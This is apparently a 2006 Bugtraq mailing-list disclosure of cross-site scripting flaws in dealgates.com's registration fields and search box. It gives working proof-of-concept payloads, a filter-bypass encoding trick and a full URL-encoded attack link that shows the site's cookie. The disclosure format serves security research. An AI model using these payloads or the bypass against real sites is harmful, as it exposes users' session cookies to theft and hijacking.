Dealgates.com - XSS with cookie disclosure

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Dealgates.com - XSS with cookie disclosure
From: luny@xxxxxxxxxxxxxxx
Date: 17 Jun 2006 09:43:16 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Dealgates.com

Homepage:
http://www.dealgates.com

Affected files:

*Input boxes when registering new account

* Search box
-------------------------------------

XSS vuln with cookie disclosure when registering a new account.


To bypass the adding backslashes to ; and ", we use the long UTF-8 unicode of 
'. PoC:

In the input boxes of "Your name:" and "Address".

<IMG SRC=javascript:alert(&#0000039XSS&#0000039)>

For the cookie:

<IMG SRC=javascript:alert(document.cookie)>

-----------------------------------

XSS vuln with cookie disclosure via search input box. For a PoC put:

">">">">">'>'>">"><<IMG SRC=javascript:alert(document.cookie)><"<"<"<"<'<'<"<"

URL:
https://www.dealgates.com/search.php?dealquery=%22%3E%22%3E%22%3E%22%3E%22%3E%27%3E%27%3E%22%3E%3CIMG+SRC%3Djavascript%3Aalert%28document.cookie%29%3E%3C%22%3C%27%3C%27%3C%27%3C%27%3C%27%3C%22&search_type=2


Screenshots:
http://www.youfucktard.com/xsp/dealgates1.jpg
http://www.youfucktard.com/xsp/dealgates2.jpg
http://www.youfucktard.com/xsp/dealgates3.jpg

Prev by Date: Housecarers.com - XSS & cookie disclosure
Next by Date: Re: Bingbox.com - XSS & cookie disclosure
Previous by thread: Housecarers.com - XSS & cookie disclosure
Next by thread: Mambo <= 4.6rc1 sql injection
Index(es):
- Date
- Thread